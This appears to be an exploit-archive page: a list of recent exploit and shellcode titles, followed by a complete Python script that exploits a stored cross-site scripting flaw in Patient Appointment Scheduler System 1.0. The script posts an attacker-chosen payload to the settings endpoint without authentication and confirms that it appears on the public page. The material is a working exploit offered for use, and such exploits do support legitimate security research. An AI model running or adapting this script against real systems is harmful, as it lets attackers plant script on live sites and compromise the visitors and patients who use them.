f33a724e0b
58 changes to exploits/shellcodes Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) ProFTPD 1.3.7a - Remote Denial of Service glFTPd 2.11a - Remote Denial of Service Hasura GraphQL 1.3.3 - Denial of Service Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) NBMonitor 1.6.8 - Denial of Service (PoC) Nsauditor 3.2.3 - Denial of Service (PoC) Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) Post-it 5.0.1 - Denial of Service (PoC) Notex the best notes 6.4 - Denial of Service (PoC) SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC) Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) Backup Key Recovery 2.2.7 - Denial of Service (PoC) memono Notepad Version 4.2 - Denial of Service (PoC) Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access vsftpd 3.0.3 - Remote Denial of Service Dlink DSL2750U - 'Reboot' Command Injection PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) Netsia SEBA+ 0.16.1 - Add Root User (Metasploit) Arteco Web Client DVR/NVR - 'SessionId' Brute Force Resumes Management and Job Application Website 1.0 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) 'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) Mini Mouse 9.3.0 - Local File inclusion rconfig 3.9.6 - Arbitrary File Upload Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS) Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated) OpenEMR 5.0.1.3 - Authentication Bypass VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection Budget and Expense Tracker System 1.0 - Authenticated Bypass Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) Blood Bank System 1.0 - Authentication Bypass Lodging Reservation Management System 1.0 - Authentication Bypass Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read Linux/x64 - /sbin/halt -p Shellcode (51 bytes) Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
75 lines
No EOL
3.8 KiB
Python
Executable file
75 lines
No EOL
3.8 KiB
Python
Executable file
# Exploit Title: Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS
|
|
# Date: 03/09/2021
|
|
# Exploit Author: a-rey
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/download-code?nid=14928
|
|
# Version: v1.0
|
|
# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
|
|
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md
|
|
|
|
#!/usr/bin/env python3
|
|
# -*- coding: utf-8 -*-
|
|
|
|
import os
|
|
import logging
|
|
import requests
|
|
import argparse
|
|
|
|
BANNER = """
|
|
╔═══════════════════════════════════════════════════════════════════╗
|
|
║ Patient Appointment Scheduler System v1.0 - Persistent/Stored XSS ║
|
|
╚═══════════════════════════════════════════════════════════════════╝
|
|
by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m
|
|
\033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m
|
|
\033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m
|
|
\033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m
|
|
\033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m
|
|
\033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m
|
|
"""
|
|
|
|
|
|
def exploit(url:str, file:str) -> None:
|
|
if not os.path.exists(file):
|
|
logging.error(f'{file} does not exist?')
|
|
return
|
|
logging.info(f'reading {file} for XSS content ...')
|
|
with open(file, 'r') as f:
|
|
xssPayload = f.read()
|
|
logging.info(f'sending XSS payload ({len(xssPayload)} bytes) to {url}/classes/SystemSettings.php ...')
|
|
r = requests.post(url + '/classes/SystemSettings.php',
|
|
data={'about_us' : xssPayload},
|
|
params={'f' : 'update_settings'},
|
|
verify=False
|
|
)
|
|
if not r.ok:
|
|
logging.error('HTTP request failed')
|
|
return
|
|
logging.info('checking for XSS payload on main page ...')
|
|
r = requests.get(url)
|
|
if xssPayload not in r.text:
|
|
logging.error(f'XSS injection failed? received: {r.text}')
|
|
logging.warning('maybe about.html is not writable?')
|
|
return
|
|
logging.success('XSS payload found on target website')
|
|
return
|
|
|
|
|
|
if __name__ == '__main__':
|
|
# parse arguments
|
|
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
|
|
parser.add_argument('-u', '--url', help='website URL', type=str, required=True)
|
|
parser.add_argument('-f', '--file', help='file with DOM content to inject', type=str, required=True)
|
|
parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False)
|
|
args = parser.parse_args()
|
|
# define logger
|
|
logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
|
|
logging.SUCCESS = logging.CRITICAL + 1
|
|
logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
|
|
logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
|
|
logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
|
|
logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
|
|
logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
|
|
# print banner
|
|
print(BANNER)
|
|
# run exploit
|
|
exploit(args.url, args.file) |